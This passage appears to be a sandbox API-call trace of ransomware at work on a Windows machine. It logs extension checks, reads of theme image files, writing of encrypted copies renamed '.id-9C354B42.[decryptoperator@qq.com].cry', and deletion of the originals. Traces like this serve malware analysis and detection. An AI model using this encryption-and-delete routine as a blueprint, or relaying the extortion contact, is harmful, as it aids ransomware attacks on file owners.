[0045.027] lstrlenW (lpString=".dbf") returned 4 [0045.027] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0045.027] lstrlenW (lpString=".1cd") returned 4 [0045.027] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0045.027] lstrlenW (lpString=".jpg") returned 4 [0045.028] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.028] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0045.028] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.028] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0045.028] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1354) returned 1 [0045.028] CloseHandle (hObject=0x178) returned 1 [0045.028] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif")) returned 0x20 [0045.028] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.028] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0045.029] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.029] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.029] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0045.030] GetLastError () returned 0x0 [0045.030] ReadFile (in: hFile=0x178, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x54a, lpOverlapped=0x0) returned 1 [0045.058] WriteFile (in: hFile=0x1ac, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x550, lpOverlapped=0x0) returned 1 [0045.059] ReadFile (in: hFile=0x178, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.059] WriteFile (in: hFile=0x1ac, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.059] SetEndOfFile (hFile=0x1ac) returned 1 [0045.059] CloseHandle (hObject=0x1ac) returned 1 [0045.059] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.059] SetEndOfFile (hFile=0x178) returned 1 [0045.060] CloseHandle (hObject=0x178) returned 1 [0045.060] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.060] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif")) returned 1 [0045.061] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0045.061] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0045.061] lstrlenW (lpString=".doc") returned 4 [0045.061] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.061] lstrlenW (lpString=".docx") returned 5 [0045.061] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.061] lstrlenW (lpString=".pdf") returned 4 [0045.061] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.061] lstrlenW (lpString=".xls") returned 4 [0045.061] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.061] lstrlenW (lpString=".xlsx") returned 5 [0045.061] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.061] lstrlenW (lpString=".ppt") returned 4 [0045.061] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.061] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0045.061] lstrlenW (lpString=".zip") returned 4 [0045.061] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.061] lstrlenW (lpString=".rar") returned 4 [0045.061] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.061] lstrlenW (lpString=".bz2") returned 4 [0045.061] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.061] lstrlenW (lpString=".7z") returned 3 [0045.061] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.061] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0045.061] lstrlenW (lpString=".dbf") returned 4 [0045.062] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.062] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0045.062] lstrlenW (lpString=".1cd") returned 4 [0045.062] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.062] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0045.062] lstrlenW (lpString=".jpg") returned 4 [0045.062] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.062] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0045.062] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0045.062] lstrlenW (lpString=".doc") returned 4 [0045.062] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.062] lstrlenW (lpString=".docx") returned 5 [0045.062] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.062] lstrlenW (lpString=".pdf") returned 4 [0045.062] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.062] lstrlenW (lpString=".xls") returned 4 [0045.062] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.062] lstrlenW (lpString=".xlsx") returned 5 [0045.062] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.062] lstrlenW (lpString=".ppt") returned 4 [0045.062] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.062] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0045.062] lstrlenW (lpString=".zip") returned 4 [0045.062] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.062] lstrlenW (lpString=".rar") returned 4 [0045.062] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.062] lstrlenW (lpString=".bz2") returned 4 [0045.062] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.062] lstrlenW (lpString=".7z") returned 3 [0045.062] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.062] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0045.062] lstrlenW (lpString=".dbf") returned 4 [0045.062] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.063] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0045.063] lstrlenW (lpString=".1cd") returned 4 [0045.063] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.064] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0045.064] lstrlenW (lpString=".jpg") returned 4 [0045.064] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.064] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0045.064] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.064] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0045.065] GetFileSizeEx (in: hFile=0x1ac, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=5120) returned 1 [0045.065] CloseHandle (hObject=0x1ac) returned 1 [0045.065] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif")) returned 0x20 [0045.065] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.065] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0045.065] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.065] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.065] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0045.551] GetLastError () returned 0x0 [0045.551] ReadFile (in: hFile=0x1ac, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x1400, lpOverlapped=0x0) returned 1 [0045.565] WriteFile (in: hFile=0x1bc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x1410, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x1410, lpOverlapped=0x0) returned 1 [0045.566] ReadFile (in: hFile=0x1ac, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.566] WriteFile (in: hFile=0x1bc, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.566] SetEndOfFile (hFile=0x1bc) returned 1 [0045.566] CloseHandle (hObject=0x1bc) returned 1 [0045.566] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.566] SetEndOfFile (hFile=0x1ac) returned 1 [0045.567] CloseHandle (hObject=0x1ac) returned 1 [0045.567] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.567] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif")) returned 1 [0045.567] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0045.567] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0045.567] lstrlenW (lpString=".doc") returned 4 [0045.567] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.567] lstrlenW (lpString=".docx") returned 5 [0045.567] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.567] lstrlenW (lpString=".pdf") returned 4 [0045.567] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.567] lstrlenW (lpString=".xls") returned 4 [0045.567] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.567] lstrlenW (lpString=".xlsx") returned 5 [0045.567] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.567] lstrlenW (lpString=".ppt") returned 4 [0045.567] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.567] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0045.567] lstrlenW (lpString=".zip") returned 4 [0045.567] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.567] lstrlenW (lpString=".rar") returned 4 [0045.568] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.568] lstrlenW (lpString=".bz2") returned 4 [0045.568] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.568] lstrlenW (lpString=".7z") returned 3 [0045.568] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.568] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0045.568] lstrlenW (lpString=".dbf") returned 4 [0045.568] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.568] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0045.568] lstrlenW (lpString=".1cd") returned 4 [0045.568] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.568] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0045.568] lstrlenW (lpString=".jpg") returned 4 [0045.568] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.568] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0045.568] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0045.568] lstrlenW (lpString=".doc") returned 4 [0045.568] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.568] lstrlenW (lpString=".docx") returned 5 [0045.568] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.568] lstrlenW (lpString=".pdf") returned 4 [0045.568] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.568] lstrlenW (lpString=".xls") returned 4 [0045.568] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.568] lstrlenW (lpString=".xlsx") returned 5 [0045.568] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.568] lstrlenW (lpString=".ppt") returned 4 [0045.568] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.568] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0045.568] lstrlenW (lpString=".zip") returned 4 [0045.568] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.568] lstrlenW (lpString=".rar") returned 4 [0045.568] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.568] lstrlenW (lpString=".bz2") returned 4 [0045.568] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.568] lstrlenW (lpString=".7z") returned 3 [0045.568] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.569] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0045.569] lstrlenW (lpString=".dbf") returned 4 [0045.569] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.569] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0045.569] lstrlenW (lpString=".1cd") returned 4 [0045.569] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.569] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0045.569] lstrlenW (lpString=".jpg") returned 4 [0045.569] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.569] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0045.569] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.569] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0045.576] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=44850) returned 1 [0045.576] CloseHandle (hObject=0x1bc) returned 1 [0045.576] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png")) returned 0x20 [0045.576] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.576] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0045.577] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.577] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.577] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0045.577] GetLastError () returned 0x0 [0045.577] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0xaf32, lpOverlapped=0x0) returned 1 [0045.651] WriteFile (in: hFile=0x16c, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xaf40, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xaf40, lpOverlapped=0x0) returned 1 [0045.653] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.653] WriteFile (in: hFile=0x16c, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.653] SetEndOfFile (hFile=0x16c) returned 1 [0045.653] CloseHandle (hObject=0x16c) returned 1 [0045.653] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.653] SetEndOfFile (hFile=0x1bc) returned 1 [0045.654] CloseHandle (hObject=0x1bc) returned 1 [0045.654] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.655] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\thmbnail.png")) returned 1 [0045.655] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0045.655] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0045.655] lstrlenW (lpString=".doc") returned 4 [0045.655] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.655] lstrlenW (lpString=".docx") returned 5 [0045.655] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.655] lstrlenW (lpString=".pdf") returned 4 [0045.655] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.655] lstrlenW (lpString=".xls") returned 4 [0045.655] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.655] lstrlenW (lpString=".xlsx") returned 5 [0045.655] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.655] lstrlenW (lpString=".ppt") returned 4 [0045.655] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.655] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0045.655] lstrlenW (lpString=".zip") returned 4 [0045.655] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.655] lstrlenW (lpString=".rar") returned 4 [0045.655] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.655] lstrlenW (lpString=".bz2") returned 4 [0045.655] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.655] lstrlenW (lpString=".7z") returned 3 [0045.655] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.655] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0045.655] lstrlenW (lpString=".dbf") returned 4 [0045.655] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.656] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0045.656] lstrlenW (lpString=".1cd") returned 4 [0045.656] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.656] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0045.656] lstrlenW (lpString=".jpg") returned 4 [0045.656] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.656] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0045.656] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0045.656] lstrlenW (lpString=".doc") returned 4 [0045.656] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.656] lstrlenW (lpString=".docx") returned 5 [0045.656] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.656] lstrlenW (lpString=".pdf") returned 4 [0045.656] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.656] lstrlenW (lpString=".xls") returned 4 [0045.656] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.656] lstrlenW (lpString=".xlsx") returned 5 [0045.656] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.656] lstrlenW (lpString=".ppt") returned 4 [0045.656] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.656] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0045.656] lstrlenW (lpString=".zip") returned 4 [0045.656] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.656] lstrlenW (lpString=".rar") returned 4 [0045.656] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.656] lstrlenW (lpString=".bz2") returned 4 [0045.656] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.656] lstrlenW 